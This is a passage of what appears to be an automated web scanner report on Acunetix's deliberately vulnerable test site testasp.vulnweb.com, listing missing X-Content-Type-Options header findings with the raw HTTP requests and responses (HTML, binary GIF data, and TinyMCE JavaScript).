<a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/ |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 206 bytes. |
GET http://testasp.vulnweb.com/ HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=NJGCKBOCAAGEAOFIEAFFCFAM; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/avatars/noavatar.gif |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 338 bytes. |
GET http://testasp.vulnweb.com/avatars/noavatar.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 247 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:28 GMT Accept-Ranges: bytes ETag: "92c8971f85c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 950 |
| Response Body - size: 950 bytes. |
GIF89addæÿÿÿá
üüüþþþúúúûûûÿþþá þþÿå1:ÿÿþæ:Bã$þÿþÿþÿáímrìzèMTä*3õ²µêU[öööä$-ìdjò«®çFMï â!æ/8ââï úÕÖùùúûúúò¥§æBIé_eìqvó»½ñíùÌÎç@GòöÑÓþúúùññ÷æçä(÷ââúÜÝùùùâ÷÷÷úêëýýýð÷ÝÝýóóñ¿Áêioâ!èCJøÇÉñ´¶ôÉËþÿÿðûßàî|îóÝÞïøÞßøõõîqx÷÷øø÷øþüüûàâíöÁÂùÓÔöÚÚîw|ôÆÈûøøòúÙÚíáûÝßäó¡ë`fúÏÑûÞßã&ð°øøøèHNýïï!ù,ddÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÀרÙÚÛÜÙÄ å 9Q9à×óñóàÆDé Y¨èÀ WH'Hß¾g^t@±bE(¼Æã A Æ(-ÚHá,Ä0+61°Ìå1@ Í8q²D!¨Q4øôÁ Éà AZ°iCL±1R ¥-Sn(Fìÿ(Tè°`¸]R.Ø8CJ[@9¡ )¿ v¥\P°AÊÄ.¤tbAÊ=,hHÙXØ o$H â:I)äIe TH©Øj*ÌDjñB&¿C æå3pD §C¢ V¸;L0 0&Øñ¸ @ÀX`Ô'ФÄ0H AÀî§`t ]`ÃP ,0ÀH¨á°üp.HH(¦¨â,¶¨â.Æ(ãÕÔhã8æ¨ã<öèã@)äDiäH&©äL6éäPF)åTViå«; |
| URL | http://testasp.vulnweb.com/Default.asp |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 309 bytes. |
GET http://testasp.vulnweb.com/Default.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>3/14/2022 7:22:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Images/logo.gif |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 313 bytes. |
GET http://testasp.vulnweb.com/Images/logo.gif HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 248 bytes. |
HTTP/1.1 200 OK
Content-Type: image/gif Last-Modified: Thu, 29 May 2008 12:11:31 GMT Accept-Ranges: bytes ETag: "ceff952185c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4933 |
| Response Body - size: 4,933 bytes. |
GIF89a2&÷HÍHå0¶0¨ò¨$«$îâHÄHªîëxÝxTÑTlálTÚTêHÒH0Ò0ôýîï0Å0TÌTÅÞ0º0ÿÿÿÆÍlÖlñ`Î`£0Î00Ì0`Ø`0°0`Ë``â`0®0lÑl¾HÙH±í<Å<0Ê0xâxxàxlÚlTàT`Þ``Ü``Ó`µHÜHHÚH¶xåxÊx×x$¾$`Ú`TÞT$Î$ÿÿ¿á
ËÊÌÉ???ÃÆÈÇ¿¿¿£½Ä§º¾°ÂÀ¢µ¸¤¨¶±¿ ¡ÁÅ»¬¹©®ª´¥«¯¼¦·þþý²³ïïï///___OOOÏÏÏ0Ç0ðßßßí¯¯¯`Ð`´ú´ñ´ù´`Í`oooá é`É``Ì`å1:¨ø¨´û´´ü´æ:Bã$xèxíøĘ̂÷¨êU[ímrä$-èMTä*3áTÄTìdjçFMüééå0¾0ítz`Ñ`æ/8ò²´â!ââöÂŨõ¨ðìä(üâãõ¼½öר<×<é_eò`Õ`xëxô¨¬ç@GèCJâ!ó£§êioúæçûÞßHÊHæBIïâlÝl$É$®<¼<òñ¦¨òH½HõÌÍýïïüäå÷ÓÔùßáúìì<Ú<TÖTñ±<È<ï}äáèHNã&ôÅÇë`fÐ$À$lçlõ°³ùØÙ¿HÕH$Ò$ö²µxØxïïñ £ë$¸$òº½üíîTÊT!ù,2&ÿ()Bp`II°I&B|ò¤IET2RѲq£Z¶¥d:'éгRK1Pbf¥¦Í@8ËèÜÙ¥ç.wî¼ú¢gàYz¥é5OÕ¨áCÕ«_¾¬Ñºf ¯zÂêé3¶O:h¥Í#HP<~âúC·M1vÛÚ[È_¿{f ÃØJø±;` <§²å?¹hæs7ݸ1CtÓqȨVí¤µk/^Àö"¶9r¤èÞ]¥÷ßU¦_BøãK7r¹çHABسkßν»÷ïàÃÿO¾¼ùóç EÎ9rá¿«H©wíÖ«ã#Z´fÌÌ1Yd b ahìaÈ^yÑåÇ[l¡Ext TñÕI5ÔO?éH#ÆäJ(E1ÒGT<Ñ"E1¤@JXÞ8æ¨ã<î¨{Ï)wDq¿ÅGßmµÅ¶§&ZgÿY6%V`ro©UY~µÕR%USI}TO]h'¦¨â eDQE9ÄPBac*è j÷ãtA"G¤»Ý~ª5iFa& T`iI×p½ ÖaUh¡UÉaCõ´N5Áÿ 'J(m1'w¨'}Öx]¡À+ì°R']{Æ-_|ºÙkê7iÔF)àih``{åðβåå¦fE¦N-EÔO®RF&Æ©¢,Úyg2$ÐÄöëï¿èz¬{Dö&_³I*É$jV¥×RYàaWî!%Bd<F¸~ ¦©c¹!¾Ánï8,¥h«Hõ¶g3îû+À8ç,%XAè@6§qðõ¶[®9Áä~ÓVËEMibÛúñÕúáÖ¸¥VH&ª¦[òÉnÆÊ2%Á3»*4#¿:Ç-wa÷!2]Ð/ÿk0ÂÏ*½piM?ýtI rµÆrê±X^.%2N%Î$ï¼tÖ{ï{æ[Ü9Êc,¬,K*çãÍÜ´{çÝDH·±¿ç·ÑÎ>´Óþ1¶F$W["B5tAØÖäZxîå$eò¯ªìùi«Í9ÔöA6ë8A6·áþûïïÊ)µÇm Ý>g·H#ül,{B²c´fÑæQùaÚ'%MAÌËX5ìÂ¥¶p-L!Ù:´½ ¡{ÓÙLB¯µ±MOÑêÌ]Àï /\4ê³û!ÃZïX´Ö'pÃ+Íÿ µ9<¦J @AEL¥ÓÌt¦¥°jM¯2Ûk%¾½O22¯p4 ~Ôh ÿeC K`Ú¤Ù(a {xDm¡A àÆ¤ç1²éBRÕRÆÆ&Á*&³ÓÆ+|ñªO+,ZqÆN¾¯kìWûG¡)¿in'8I-¦È- ²KÔ ®§H£EsíRY¼XbQRW»Ê×@2 MnÂÜ*B9¬Q«r ;! !°àR¸A Jha¥@ BñpÆ3§°ÐÀ®öÿP k=Æ h`p+5HèÔagÀ@%&ÚHxÀ<ÁÑDáûÀĸÁ`àðU³1gÏ&4ÕèJ0wL D¬,pGHÝÁGèn§==ªvxêÓì È%;Fè´;ªÝ¼aç©°Û" úU²fà©XpÄv$ÑÓ¦çPÑ1妰ztóq?¸DÆ"À8îqBè®Ä¥aa~X!`c~@c zÊ]¸-àP« ¨¸Z&Lt5ܰ#XÁ>8Äm¼ÙxL!ÓÚÿÃÝ +îp÷T»mØ-îüq§¸DÐU*\»=b;Ъp¡ÖPU¸LÀÎr±cCExU»vs«xt¤öÌUÅ^É6ÍXaX!L¢0ìcý`÷ aåºÚ·ÙÎf(: mÆF§« ±@c/PºÐÝ .dê WÈtÛA.¸Þ4¹Ù±!1Ö ¸Æ ±o³sÝcÁ 6ÅR£k7«âøÄ(«nÇUë!»ØA.3\F¼*Î8{׫ñUip¯fâ+ùR©¾EC~÷ØÔ½-°Pó3Xÿìh! XL`¢±w¾&Î7§$E-Nh$C¤Æ7´S7»»Áqѱ~w§ùC®,i#a>±[û\í ÷ÑÖï3pâçÚ°ouâ*$â ãj gл×Ö´÷j AX.pÙËv3aöPË»0àq hAÎ\1Ö¶(8ëYW)XðÜã.ð<8c ÁLg!ìÉmé7rqÆM°¢;ñpá}¡G;ÀSí¶êãÆØÔ¦ªw·s»g§ÒèN¥j#¯Òø®"ª[õË9<ÔkÆ6p° X¹5?ÿ¸Z)°Fürb óÇ«ò. ¸ÔÒùYy\ÄöæF~;Ü F÷Hp5hD«° e{Ô[Ø9E*n1 ~gàé8ã(´sb¥j§Ò(fõÁ»£i§ÝâÝùwÞ3+ØýîZMñÚ·«GDÚÑ«Nv5 üM "DkJpµHË?Æ&,¶MKSp Èèú«ÑLÍ«âRÞ¼¦.Î@^qµW¼¨W{ýXØQÅ[_² q§µ£[á¿íkçôÛù¾¹«¸¹»Õû {dî wý<ïäJ«]oMÿ3¦@È{ò3¯|Æn>«)`zf9ç·rÙ & ôÞ¸3v9àj#p'°u Á'FußQFfäPf$ ØA għÞ\Æm·pÕÇÎg7À$X&(}nÄ|ÒG¥¼Ó;Ý1ßw0r~NP W³ ã0ð%yÒµlÍÖ~ó~¢ò1´@à öçfWmrz1QZ&ñ3¯{ïö6è«pFý¬`F®0g[v]|F}!èpâQq*8iG×që(æµê%¢px ¨xNÀxNÿÂ\æWfÌfywÑW£ma³p5üÀBàö÷fÀ&T(V¨"X(ZHèn¦s:_ØôCgpF¸ÅpFÆ ?vsUÛvÂH|ÈÈy'|urw=ÖàFzøÆÁk.øÙ´ W#C'ç)p5¨¤ÐÖlSW£Bm°Oó*ð%Ïv5]õVôfÀ.1ذ2Wã iÓ¯ø±Ø èã'µÈëpFÝÒpFì©pFú0pØþ&i×GܸVÜ5FptwxèiB};µw#ÿ\%édO6kqT2ð8p"·^N 3 NPò8¡Ð ð8äPëGAÕ<1 WxtMØKð8Àç1°BÀ"á[1(daaÛ±f4 ` 1?«v C½øp=vT bo§UC@ØqÖ U-w ¯Æq [^u])k7KàþÕk%póAH@è_6 fa)6pÐnFI'$0/n \(FIehF ¤{9·Cà°T»ÕZøv~;D S$©$;)©j0ÿ)^×I'6bßuHæç~gJÉ!ðÐX¢®¡¼XÕòîÕSsëç)~ÐgX`=¹*Fñþ¤1Éh'±B5CÚA[wŰaCð íCÀÀVÐ+æØwÒµ[;;Ôµ{h1©|Øuiì ^;*U"kß4¤(ÅqC6¨;Ð ôðWó(0 C=À ô J2GYu+S Ú"9sYÛ" ?Ìðâá¡/ÄÜq°LÀ@¤ÛA X@IõSÀ$ÿ¨ ĸ#ðÊiE;PVk47À, <Â$)P Ð3(à: @.-Yrw0 ³À6A=w`Qà@"iÚ2ÅT'ö23ïÆ+´ùðB äñî³ â@Màª};´(FBH)d°CD-ð4QcXÉ âÒqKÕ³e*j°H¿LïRoò*6Qã#3`4ñF ¤@ ±P¢ò¦ À«x®K(QÆCEr0u$<£ë:¥¯³%5¢<E_ÿi9aã ÛHï"Bqâ2jãEȤ¡ná{´qMH:G&{²¡£á0Ó²!KÛB«1Ë%Eb2þú¯d2Û³9Þ/r">$aÔ+F´nû/p$§D@t´JÂãxG,5U[ Pò%rKw_Q.S.yEÔ&$+òò2,¢.Bj;{mû¶ûFÞ,À0)Bä4î1~;«  M.\s¸Ö£A°2>ë¬sB'ñE4CÕº¹Àë/F*·Éò;Í"³aN®4DÖ<~D«"H®{Aaj9#¶jâ*=+?û¬&Ä6ÿû»Á;¾ÁRJAÉ´&ë,Ð");X)T+Kr%ô*H%.G¬BE«ÂAÛ#"ÛIÎÊEº¶øÒAK¾ #@»,Ìb@É+8KÓ4P5RÓÊ)µ*³â"Óµù*³K¬¥W6Íê¬/3Àö¾¾ë+1#A¼²'æy#Q¹Á>¬°#A&A+*Á/á46q9±:Á& "Dá!J¡LáP!SQWaY±]á`!dagkÑo!sQ¶j|Ña1 q¡á!a ÁýA8ûK"BIÓÏ2µQ¹Ñ(ó Åaî¡ '@R; |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Ep